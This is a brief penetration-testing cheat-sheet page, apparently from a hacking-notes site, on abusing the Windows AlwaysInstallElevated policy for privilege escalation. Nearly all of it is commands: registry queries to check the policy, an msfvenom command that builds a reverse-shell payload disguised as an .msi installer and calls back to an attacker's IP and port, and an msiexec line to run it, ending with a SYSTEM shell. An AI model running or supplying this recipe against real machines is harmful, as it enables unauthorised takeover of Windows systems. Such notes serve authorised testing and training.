Always Install Elevated
TIP: winPEAS also enumerates this attack vector
1) Query registry keys
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated2) Create a malicious .msi file and transfer it on the attacking machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f msi -o Application.msi3) Manually try to install the .msi file
msiexec /i "path\Application.msi"4) Got a shell as SYSTEM.
Last updated